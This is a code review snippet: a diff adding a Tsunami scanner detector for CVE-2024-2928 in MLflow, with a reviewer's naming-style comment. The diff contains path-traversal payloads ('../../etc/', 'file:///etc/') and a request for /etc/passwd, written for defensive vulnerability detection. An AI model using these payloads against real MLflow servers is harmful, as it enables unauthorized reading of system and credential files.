community/detectors/mlflow_cve_2024_2928/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20242928/Cve20242928VulnDetector.java

```diff
@@ -0,0 +1,390 @@
+import java.time.Instant;
+import java.util.regex.Pattern;
+import javax.inject.Inject;
+
+/** A {@link VulnDetector} that detects the CVE-2024-2928 vulnerability. */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "CVE-2024-2928 Detector",
+    version = "0.1",
+    description = "Checks for occurrences of CVE-2024-2928 in MLflow instances.",
+    author = "frkngksl",
+    bootstrapModule = Cve20242928DetectorBootstrapModule.class)
+@ForWebService
+public final class Cve20242928VulnDetector implements VulnDetector {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+  private final Clock utcClock;
+  private static final String EXP_CREATION_PATH = "ajax-api/2.0/mlflow/experiments/create";
+  private static final String RUN_CREATION_PATH = "api/2.0/mlflow/runs/create";
+  private static final String MODEL_CREATION_PATH = "ajax-api/2.0/mlflow/registered-models/create";
+  private static final String LINK_PATH = "ajax-api/2.0/mlflow/model-versions/create";
+  private static final String EXP_DELETION_PATH = "api/2.0/mlflow/experiments/delete";
+  private static final String MODEL_DELETION_PATH = "ajax-api/2.0/mlflow/registered-models/delete";
+
+  private static final String EXP_PAYLOAD =
+      "{\"name\": \"poc\", \"artifact_location\":"
+          + " \"http:///#/../../../../../../../../../../../../../../etc/\"}";
+  private static final String RUN_PAYLOAD = "{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}";
+  private static final String MODEL_PAYLOAD = "{\"name\": \"poc\"}";
+  private static final String LINK_PAYLOAD =
+      "{\"name\": \"poc\", \"run_id\": \"{{RUN_ID}}\", \"source\": \"file:///etc/\"}";
+
+  private static final String VULN_PATH =
+      "model-versions/get-artifact?path=passwd&name=poc&version=1";
+  private static final Pattern VULNERABILITY_RESPONSE_PATTERN = Pattern.compile("(root:[x*]:0:0:)");
+
+  private String experimentID;
+  private String runID;
+
+  private static HttpClient httpClient;
+
+  @Inject
+  Cve20242928VulnDetector(@UtcClock Clock utcClock, HttpClient httpClient) throws IOException {
+    this.utcClock = checkNotNull(utcClock);
+    Cve20242928VulnDetector.httpClient =
+        checkNotNull(httpClient, "HttpClient cannot be null.")
+            .modify()
+            .setFollowRedirects(false)
+            .build();
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(Cve20242928VulnDetector::isWebServiceOrUnknownService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private static boolean checkMLflowFingerprint(NetworkService networkService) {
```

Comment:
Abbreviation in name 'checkMLflowFingerprint' must contain no more than '1' consecutive capital letters. Please rename these variables and all its occurencies.